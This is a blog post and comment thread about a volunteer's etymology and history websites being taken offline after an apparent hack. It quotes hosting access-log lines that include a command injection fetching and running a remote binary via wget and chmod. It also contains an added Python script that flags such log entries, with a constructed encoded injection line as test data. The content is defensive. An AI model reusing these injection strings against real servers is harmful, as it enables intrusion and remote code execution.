Winds of Change.NET: Liberty. Discovery. Humanity. Victory.


Computer Help?


This is pathetic, but does anyone know anything about Web sites? I have been hosting two Web addresses -- etymonline.com and slavenorth.com -- with 1and1.com for a couple of years now. Both are text sites primarily, with a few pictures. They're very basic, but they get a steady flow of traffic. The first is the only really comprehensive free English etymology dictionary on the Internet. The second is the only general overview of black slavery in the Northern colonies and states of the U.S. They get a steady flow of visits from students and researchers. I don't generate income off them; they're there for people to use, and I pick up the tab for domain hosting.

Or they were there. About a month ago I got a notice from 1and1 informing me I was using too much of their bandwidth and demanding I upgrade my account. I figured the sites' popularity had grown past some tipping point. I went through the steps to change my account setting, to charge myself more money, and figured that was that. About a week ago, I got another e-mail from them, informing me that my service was going to be cut off if I did not upgrade my account. I wrote back protesting that I had upgraded the account. I never got an acknowledgment.

Yesterday, I find all my Web sites gone from the Internet and my account locked.

Needless to say, years of research going down the tubes is not a happy experience, nor is fielding inquiries from the many people who rely on these sites.

I want to know what happened, and what they expect me to do to solve this problem, so I can judge whether it is within my capability to do so. But so far no one there has been able to tell me anything in words I understand. I work nights, and I have stayed up half of today (my normal sleeping time) trying to find someone at 1and1 to give me answers. No luck.

This is what I was able to glean from the tech support person at billing: There's "something running in your space that's crashing the server that it's on." It started around November 29. It causes a "spike in resources," which is why they cut off my service.

I have made no significant changes to my Web site in more than a year, certainly nothing on November 29. I don't use the site to do any mailing or anything but offer text for view. Is it possible that some sort of hacker script got into the site, and is using it to generate spam? Does that even make sense? Is that consistent with what they told me? Or have I simply been awake too long?

Is there anyone who can tell me what might be wrong, or suggest some questions I can ask that might yield answers, since none of mine so far has? Or shall I write off these sites as dead?

Any suggestions can be mailed to byronic106@yahoo.com and would be appreciated. For now, I'm going to bed.

14 Comments

Your answers are all hosting company specific. It's possible that your account was cracked and that's what was driving up your usage. But there's no way to tell without going in and looking around for things that you didn't put there, and you can't do that with your account disabled.

If you have backups of your data, you should probably just set up with another hosting company.

If you don't, then you need to get in touch with them - a real, live person on the phone - ASAP to see if they have backups of your data and can supply them to you. Service levels and policies vary widely, so there's no way to know until you try.

Good Luck!

Did your etymonline.com come back on line? I did a google to see the cached version, which came up, then did some alphabet and page number pecking which also brought up the correct pages. It also comes up online when I type in the url.

And slavenorth.com is also up.

Here's hoping you got it resolved. Time to make backups.

BTW, thanks for the additional slavenorth link. I've used the other one for over a year now, so thanks for that, too.

Good morning from the left coast. You can find your sites here too:

http://web.archive.org/web/*/etymonline.com
http://web.archive.org/web/*/slavenorth.com

The most routine of log analysis on the log files on the sites will tell you what has been generating all this traffic, and perhaps why.

Text-heavy sites don't use up traffic, they just don't.

This is odd. I can bring up slavenorth.com by typing it into the browser, but when I used the "dig" utility to find the IP address of slavenorth.com it came up with 82.165.193.29. When I typed this into the browser, I got a 404 page not found error in German.

If you can get access to them you should download a copy of your server logs. This should give you some idea of what is going on. I do not know if your hosting provider gives you the power to access a database or run cgi programs, but if they do you should disable those functions. And change your password ASAP.

An unsolicited unpaid testimonial: I moved recently to Living Dot. Their basic plan is inexpensive and their tech support people are responsive. If you ever want to move to Movable Type, they are experienced with it.

It sounds to me like your site was cracked. That happened to me a few weeks ago on Christmas Eve. I was sorely miffed and I had to fix everything and delete all their files which they had uploaded.

Perhaps somebody cracked your account and was using it to upload/share cracked files. That does happen sometimes. The only way to know is to FTP into your site, which apparently you can no longer do, and check out the files, as well as check for recently changed files.

UPDATE: Sites seem to be there again, but if so, it is a temporary reprieve. The company gave me some access to the account to try to figure out the problem.

Thanks to those who have written with advice; I haven't had a chance to thank you individually yet.

To work on these sites, especially the dictionary, which requires constant updating and niggling formatting work, I had someone wiser than I set up a system to make changes simply. It involves files with .php extensions. I can do HTML by myself, but this, apparently, is the next generation beyond that. It made my work much easier, but perhaps this is where the vulnerability occurs.

Other problem is, with this system, I no longer seem to have the text of the dictionary on my own computer and wouldn't know how to get it back from the server if I had to.

1and1 wrote to me today and listed the two dozen or so .php files on the site and said:
These are known as "scripts". If your bandwidth is not high, nor do you run scripts very often, then it is likely that you were hacked as shown in the evidence we have gathered from your access logs.

access.log.48.gz:164.115.5.19 - - [30/Nov/2005:09:42:47 0500] "GET /scgi-bin/webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 1997 82.165.245.3 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"

access.log.51.gz:201.24.42.55 - - [25/Dec/2005:22:10:07 0500] "POST /index.php?term=mesa/xmlrpc.php HTTP/1.1" 200 4465 www.etymonline.com "" "" ""

XML-RPC is a library for open-source code for PHP users. PEAR XML-RPC versions
prior to 1.3.1 could allow a remote attacker to execute arbitrary PHP code
caused by an unspecified vulnerability. A remote attacker using an application
that uses the vulnerable library could use this to execute arbitrary PHP code on
the system.

phpWebSite versions prior to 0.10.0 are also vulnerable to SQL injection, caused
by improper validation of user-supplied input to the XML-RPC server, using the
POST method. A remote attacker could exploit this vulnerability to add, modify
or delete data in the backend database. phpWebSite versions prior to 0.10.0
could also allow a remote attacker to traverse directories, caused by improper
validation of user-supplied input to the XML-RPC server, using the POST method.
A remote attacker could send a specially-crafted archive that will allow the
attacker to traverse directories and obtain sensitive information.

Note: It is reported that XML-RPC for PHP version 1.x, Serendipity versions
prior to 0.8.2, and phpMyFAQ versions 1.4 and 1.5, and Drupal versions prior to
4.5.4 and 4.6.2, MailWatch for MailScanner 1.0, Tikiwiki versions
1.8.5-r1 and earlier, Ruby version 1.8.2-r2 and earlier for Gentoo Linux, Ruby
version 1.8 for Mandrake Linux, Jaws versions prior to 0.5.2 and FreeMED
versions prior to 0.8.1.1 are also vulnerable to this vulnerability.

I am going to try to track down the fellow who wrote that code. He was basically a fan of the site who did the work for free as a gesture of gratitude.
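The two log lines 1and1 quoted already say a lot on their own. The first is a command injection aimed at a webhints CGI: `$IFS` stands in for a space so that the query string becomes `cd /tmp; wget 62.101.193.244/lupii; chmod +x lupii; ./lupii 62.101.193.244`, a fetch-and-run of a binary from a remote host. It got a 404, so that script was not on the site and the attempt failed. The second is a POST to `xmlrpc.php` that returned 200, which is the XML-RPC vector the advisory text above describes, and is the one worth chasing. The script below is an added example, not the author's or 1and1's tooling, that does the "routine log analysis" the earlier comments recommend: it parses Apache-style access log lines, URL-decodes the request so encoded payloads are judged the same as raw ones, and flags the patterns seen here. The two quoted lines are used as input (with the `access.log.NN.gz:` grep prefix removed) together with two constructed lines, one encoded injection attempt and one ordinary dictionary lookup that must not be flagged.

```python
"""Pick requests that look like exploitation attempts out of Apache-style
access log lines, the 'routine log analysis' suggested above.

Added example, not the author's or 1and1's tooling.  The two log lines 1and1
quoted are used as sample input (with the grep 'access.log.NN.gz:' prefix
removed), plus two constructed lines: one URL-encoded injection attempt and
one ordinary dictionary lookup that must not be flagged.
"""
import re
from urllib.parse import unquote

# Combined-format prefix: client ident user [time] "METHOD PATH PROTO" status bytes.
# 1and1 appends extra fields (vhost, referer, user-agent, ...); they vary by host
# configuration, so they are swept into 'rest' rather than parsed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>.*?) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)(?P<rest>.*)$'
)

# $IFS is the shell's field separator; attackers use it to smuggle a space through
# a CGI parameter.  Backticks, ';' and '|' chain further commands.
SHELL_META = re.compile(r'\$IFS|`|;|\|')
# Commands a dropper runs: fetch a binary, make it executable, change into /tmp.
DROPPER_CMDS = re.compile(r'\b(wget|curl|fetch|lynx|chmod|cd)\b', re.I)
# The endpoint the PEAR XML_RPC / phpxmlrpc advisory above is about.
XMLRPC = re.compile(r'xmlrpc\.php', re.I)


def parse(line):
    """Split one log line into named fields, or None if it is not in the expected format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry):
    """Reasons an entry looks hostile; empty list means nothing matched."""
    decoded = unquote(entry['path'])          # %24IFS -> $IFS, %3B -> ; ...
    as_shell = decoded.replace('$IFS', ' ')   # so \b word boundaries line up
    reasons = []
    if SHELL_META.search(decoded) and DROPPER_CMDS.search(as_shell):
        reasons.append('shell command injection in request URL')
    if entry['method'] == 'POST' and XMLRPC.search(decoded):
        reasons.append('POST to xmlrpc.php (XML-RPC exploitation vector)')
    if '/tmp' in decoded:
        reasons.append('references /tmp, the usual staging directory for droppers')
    return reasons


def triage(lines):
    """Return only the entries that match a rule, annotated with the reasons and whether
    the server answered 2xx (a 404 means the targeted script was not even there)."""
    flagged = []
    for line in lines:
        entry = parse(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            entry['reasons'] = reasons
            entry['decoded_path'] = unquote(entry['path'])
            entry['likely_succeeded'] = entry['status'].startswith('2')
            flagged.append(entry)
    return flagged


def by_source(flagged):
    """Flagged requests per client address: what to block and what to name in an abuse report."""
    counts = {}
    for entry in flagged:
        counts[entry['ip']] = counts.get(entry['ip'], 0) + 1
    return counts


SAMPLE_LOG = [
    # the two lines quoted by 1and1
    r'164.115.5.19 - - [30/Nov/2005:09:42:47 0500] "GET /scgi-bin/webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 1997 82.165.245.3 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"',
    r'201.24.42.55 - - [25/Dec/2005:22:10:07 0500] "POST /index.php?term=mesa/xmlrpc.php HTTP/1.1" 200 4465 www.etymonline.com "" "" ""',
    # constructed: the same kind of injection, URL-encoded, which a plain grep for '$IFS' misses
    r'198.51.100.7 - - [01/Dec/2005:03:14:15 0500] "GET /cgi-bin/script.cgi?arg=%7Ccd%24IFS%2Ftmp%3Bwget%24IFS198.51.100.9%2Fbot%7C HTTP/1.0" 404 1997 82.165.245.3 "" "-" "-"',
    # constructed: an ordinary dictionary lookup, must not be flagged
    r'192.0.2.10 - - [01/Dec/2005:03:15:00 0500] "GET /index.php?term=mesa HTTP/1.1" 200 9021 www.etymonline.com "http://www.google.com/" "Mozilla/5.0" "-"',
]

if __name__ == '__main__':
    hits = triage(SAMPLE_LOG)
    for h in hits:
        print(h['ip'], h['time'], h['method'], h['status'], h['decoded_path'])
        for r in h['reasons']:
            print('   ', r)
    print('per source:', by_source(hits))
```

Run it over the gunzipped rotated logs (`zcat access.log.*.gz | python3 triage.py` after swapping `SAMPLE_LOG` for `sys.stdin`) and sort by the `likely_succeeded` flag: a request that was answered 404 never reached any code, while a 200 to `xmlrpc.php` means the site's PHP handled the request, and that is where to look for what was written to disk afterwards. The rules are deliberately loose heuristics; a `;` or `cd` in a legitimate query can trip them, so read the hits rather than blocking on them blindly.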

This reminds me to back up my site. Sorry to profit from your misfortune!

I hope someone gave you a direction to head on retrieving the files. If you can FTP into your site, as Banagor notes, it should be easy to retrieve all the files.

You might want to check with 1and1 on the method. Firefox has a nice FTP add-on for their browser that works like Windows Explorer after you type in the address, ID and password, then connect to the site. When connected, it's just a highlight then drag-and-drop files routine from the site directory to a directory/folder on your computer.

After that you should have everything you need to restart the site should all be lost for some reason. But don't believe any of the above unless someone confirms it. I only know enough to be dangerous.

PHP can be very buggy and has multiple vulnerabilities that can be exploited. This is mainly because PHP is so flexible. Whoever helped you by writing the code should know enough about it to look at the stuff on your site and check to see if there are any security problems on your site. Good luck and hope you get it worked out.

I also use 1and1, and their e-mail servers have been running roughly on only one cylinder on a good day of late, and their webmail server is completely busted. E-mail to tech support hasn't gotten any response.

Not quite sure what's going on over there, but I'm guessing someone went on a rampage through their systems.

Callimachus, Hosting Matters has a variety of low-cost, flexible hosting plans. They also have an easy-to-use graphical interface for non-techies.

However, if your code was vulnerable and got hacked, that will have to be fixed to prevent a repeat.

I don't know how well you know the php guy, but if there is a vulnerability in his script it is possible he put it there for his own use, ie a backdoor. If you don't know him well you might want to have someone else review the code.
